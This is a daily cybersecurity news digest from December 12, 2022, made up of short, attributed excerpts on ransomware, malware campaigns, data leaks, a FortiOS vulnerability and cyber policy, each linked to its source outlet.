Monday, December 12, 2022 // (IG): BB // Bubba3dPrints // Coffee for Bob
Iran thwarts hackers’ attack on Imam Khomeini Airport City
FROM THE MEDIA: Iranian cybersecurity experts have foiled a hacking attack on Imam Khomeini Airport City in the south of the capital Tehran, preventing any major interruption in the airport’s operations. Iran’s Tasnim news agency quoted Mohammad Ja’farabadi, the director general of the airport, as saying on Monday that the so-called Anonymous hackers launched a distributed denial-of-service (DDoS) attack on the website of the airport on Sunday. “As a result, there were problems in the airport’s operations for about fifteen minutes. However, the airport city’s multilayered support system prevented the hackers from taking control of its website,” the official said.
READ THE STORY: PressTV
Post-quantum cryptography experts brace for long transition despite White House deadlines
FROM THE MEDIA: The White House’s aggressive deadlines for agencies to develop post-quantum cryptography strategies make the U.S. the global leader on protection, but the transition will take at least a decade, experts say. Canada led the Western world in considering a switch to post-quantum cryptography (PQC) prior to the Office of Management and Budget issuing its benchmark-setting memo on Nov. 18, which has agencies running to next-generation encryption companies with questions about next steps. The memo gives agencies until May 4, 2023, to submit their first cryptographic system inventories identifying vulnerable systems, but they’ll find the number of systems reliant on public-key encryption — which experts predict forthcoming quantum computers will crack with ease — is in the hundreds or thousands.
READ THE STORY: FEDSCOOP
New Research Raises Alarm Against Congress must pass Cornyn-Schumer’s NDAA microchips amendment
FROM THE MEDIA: While the COVID-19 pandemic opened the American public’s eyes to many aspects of governmental policy, perhaps the most striking was the realization that the nation has become too dependent on China for critical goods. From medical to high-tech devices, the American people began to clearly recognize that they could no longer remain beholden to the communist nation for life’s necessities. As a former up-and-coming member of the Chinese Communist Party before fleeing to the United States and becoming a leading American activist against it, I can attest to the urgent need for the U.S. to divest from China in areas of health and security importance.
READ THE STORY: Washington Times
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere
FROM THE MEDIA: New research from Cisco Talos reveals that the infamous TrueBot malware has updated its modus operandi and now hits the U.S. with additional payloads such as the infamous Clop ransomware. According to Cisco Talos, TrueBot malware now collects Active Directory information, which means it targets businesses with larger IT resources. In addition to targeting larger organizations, the malware is experimenting with new delivery methods: Netwrix Auditor bundled with the Raspberry Robin malware. TrueBot is a downloader malware under active development since 2017. Its goal is to infect systems, collect information on the compromised host to help triage the targets and deploy additional malware.
READ THE STORY: TechRepublic
LockBit ransomware crew claims attack on California Department of Finance
FROM THE MEDIA: A notorious and prolific ransomware operation claimed on Monday to have stolen 76 gigabytes of data from the California Department of Finance. In a statement on its website posted early Monday, LockBit — a group the U.S. Department of Justice describes as one of the “most active and destructive ransomware variants in the world” — announced that it targeted systems belonging to the California Department of Finance and gave the agency a Dec. 24 deadline, when the group is threatening that it will publish the stolen files.
READ THE STORY: CYBERSCOOP
Indian foreign ministry’s Global Pravasi Rishta portal leaks expat passport details
FROM THE MEDIA: The Cybernews research team has been alerted that the Global Pravasi Rishta Portal was leaking sensitive user data. Unfortunately, the tip proved accurate. The platform exposed user names, surnames, country of residence, and email addresses in plaintext, as well as occupation status, phone and passport numbers. The leak was possible because of poor security measures, such as a lack of authentication methods. The Global Pravasi Rishta Portal is a platform with the goal of connecting 30 million Indian expats. The platform owner is the Ministry of External Affairs of India, the country’s government body responsible for implementing foreign policy.
READ THE STORY: Security Affairs
Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug
FROM THE MEDIA: Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. The CVE-2022-42475 flaw is a heap-based buffer overflow issue that resides in FortiOS sslvpnd. “A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.” reads the advisory published by the security vendor. “Fortinet is aware of an instance where this vulnerability was exploited in the wild,”
READ THE STORY: Security Affairs
Japan to amend laws to allow for offensive cyber operations against foreign hackers
FROM THE MEDIA: The Japanese government is planning to introduce new laws that will allow it to engage in offensive cyber operations for the purposes of defending itself. The Nikkei reported that the government will make “legislative changes so it can begin monitoring potential attackers and hack their systems as soon as signs of a potential risk are established.” Documents seen by the newspaper state that Japan will strengthen its cyber defense “to a level equal to major Western powers” and include measures for “active cyber defense” allowing the authorities to intervene before damage is caused, even when there is no use of traditional force against the country.
READ THE STORY: The Record
Xnspy stalkerware spied on thousands of iPhones and Android devices
FROM THE MEDIA: Alittle-known phone monitoring app called Xnspy has stolen data from tens of thousands of iPhones and Android devices, the majority whose owners are unaware that their data has been compromised. Xnspy is one of many so-called stalkerware apps sold under the guise of allowing a parent to monitor their child’s activities, but are explicitly marketed for spying on a spouse or domestic partner’s devices without their permission. Its website boasts, “to catch a cheating spouse, you need Xnspy on your side,” and, “Xnspy makes reporting and data extraction simple for you.”
READ THE STORY: TC
North Korean Cyber Spies’ New Tactic: Tricking Experts Into Writing Research for Them
FROM THE MEDIA: The sender was actually a suspected North Korean spy seeking information, according to those involved and three cybersecurity researchers. Instead of infecting his computer and stealing sensitive data, as hackers typically do, the sender appeared to be trying to elicit his thoughts on North Korean security issues by pretending to be 38 North director Jenny Town. “I realized it wasn’t legit once I contacted the person with follow up questions and found out there was, in fact, no request that was made, and that this person was also a target,” DePetris told Reuters, referring to Town. “So I figured out pretty quickly this was a widespread campaign.”
READ THE STORY: Insurance Journal
Cryptomining campaign targets Linux systems with Go-based CHAOS Malware
FROM THE MEDIA: In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). The Chaos RAT is based on an open-source project. Like the original project, the malware is able to terminate competing malware, security software, and is used to deploy the Monero (XMR) cryptocurrency miner. The malware maintains persistence by altering /etc/crontab file and downloads itself every 10 minutes from Pastebin. “This is followed by downloading additional payloads: an XMRig miner, its configuration file, a shell script looping “competition killer,” and most importantly, the RAT itself.” reads the analysis published by Trend Micro.
READ THE STORY: Security Affairs
Ukrainian railway, state agencies allegedly targeted by DolphinCape malware
FROM THE MEDIA: Ukrainian government agencies and the state railway are the latest victims of a new wave of phishing attacks, Ukraine’s Computer Emergency Response Team (CERT-UA) reported last week. The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone, capitalizing on fears over the Russian use of Iranian-made Shahed-136 kamikaze drones to target crucial energy infrastructure in Ukraine. The attackers, tracked by CERT-UA as UAC-0140, used the emails to distribute the DolphinCape malware, developed with the Delphi programming language.
READ THE STORY: The Record
Royal Ransomware Targets US Healthcare
FROM THE MEDIA: The ransomware group known as Royal has been targeting the healthcare industry in the US, warned the Health Department (HC3) last week. "HC3 is aware of attacks against the Healthcare and Public Healthcare (HPH) sector," wrote the department in an analyst note last Wednesday. "Due to the historical nature of ransomware victimizing the healthcare community, Royal should be considered a threat to the HPH sector." According to the analyst note, requested ransom payment demands ranged from $250,000 to over $2m.
READ THE STORY: InfoSecMag
Major Android Security Leak: Manufacturer Signing Keys Used To Validate Malware Apps
FROM THE MEDIA: A security leak involving manufacturing keys from major device producers (such as LG and Samsung) has created a path for malware apps to make it onto user devices in the guise of legitimate updates. These malware apps can give an attacker full access to an Android device, as the operating system trusts any app that has been signed with this key with complete system-level access. This attack would not necessarily require the end user to download a new app; it could be inserted as an update to an existing app on the device. It would not matter if the app had originally been installed via the Play Store, a manufacturer-specific outlet such as the Galaxy Store, or if it was independently sideloaded onto the device.
READ THE STORY: CPOMAG
Evilnum group targets legal entities with a new Janicab variant
FROM THE MEDIA: Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks are part of a campaign aimed at legal and financial investment institutions in the Middle East and Europe. The campaign took place in 2020 and 2021, but experts speculate it has been active since 2015. The threat actors employed a new variant of the Janicab malware that relies on public services like WordPress and YouTube as dead drop resolvers. The researchers spotted the new variant while investigating Evilnum (aka Deathstalker) intrusions that use the Janicab malware family. The experts believe DeathStalker is a group of mercenaries or threat actors that act as an information broker in financial circles.
READ THE STORY: Security Affairs
“Misleading attack” threatens blockchain security
FROM THE MEDIA: The cyber threat received such a name due to its misleading nature: as such, it attempts to deceive miners – those who mine digital currencies and validate transactions on a blockchain. Specifically, the attack steals some of their computational power and redirects it to a different chain. “The misleading attack is orchestrated by someone who redirects some miners computational power to a different chain, so that it (the attacker) can outrun the main chain and thus make its fork the dominant one,” CDU Professor Mamoun Alazab said. According to Alazab, through a series of competition losses, the threat actor’s chain becomes the dominant one. Not only does this attack have a high success rate, but it also increases the success rates of other blockchain attacks.
READ THE STORY: Cybernews
Twitter confirms recent user data leak is from 2021 breach
FROM THE MEDIA: Twitter confirmed today that the recent leak of millions of members' profiles, including private phone numbers and email addresses, resulted from the same data breach the company disclosed in August 2022. Twitter says its incident response team analyzed the user data leaked in November 2022 and confirms it was collected using the same vulnerability before it was fixed in January 2022. "In November 2022, some press reports published that Twitter users' data had been allegedly leaked online," reads the update. In January 2022, Twitter received a report through its bug bounty program that an API vulnerability allows an attacker to feed email addresses or phone numbers and get an associated Twitter ID for a registered account.
READ THE STORY: Bleeping Computer
Uber suffers new data breach after attack on vendor, info leaked online
FROM THE MEDIA: Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident. Early Saturday morning, a threat actor named 'UberLeaks' began leaking data allegedly stolen from Uber and Uber Eats on a hacking forum known for publishing data breaches. The leaked data includes numerous archives claiming to be source code associated with mobile device management platforms (MDM) used by Uber and Uber Eats and third-party vendor services.
READ THE STORY: Bleeping Computer
FCC to update satellite rules
FROM THE MEDIA: A US bipartisan House Energy & Commerce Committee has introduced potential legislation to update the FCC’s current satellite licensing rules. One aspect will be the prohibition of Chinese businesses, although it is not yet completely clear whether the legislation will cover satellites where ownership – as distinct to components – includes Chinese companies. This could affect Eutelsat and its merger with OneWeb, for example. Eutelsat has a Chinese shareholder. The legislation also covers Russia, although again further clarity will be needed on operators which are correctly licensed by the ITU and how that would impact their US services.
READ THE STORY: Advanced Television
Items of interest
Technical issue likely to blame for Iranian news channel outage, says Eutelsat
FROM THE MEDIA: A technical issue likely knocked Iran’s Press TV temporarily off the air last week, Eutelsat said as the French satellite operator calls on partners to stop broadcasting the news channel to comply with European sanctions. The Iranian state-owned news network lashed out at Eutelsat Dec. 7 via Twitter and an article — which has since been updated — after losing service for what it described as an attack on free speech. Press TV initially said Eutelsat had “taken Press TV off air” before updating the article’s text to instead focus on a notification about plans to drop the channel without mentioning the service outage.
READ THE STORY: SN
The State of Data Security: The Human Impact of Cybercrime (Video)
FROM THE MEDIA: Over one-third of organizations had a leadership change in the last year due to a cyberattack and its follow-on response.
Blurring the Lines Between Espionage and Cybercrime with Rafe Pilling (Video)
FROM THE MEDIA: Since 2020, Iranian threat groups have been conducting disruptive operations in Israel, quickly spreading to other parts of the world.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com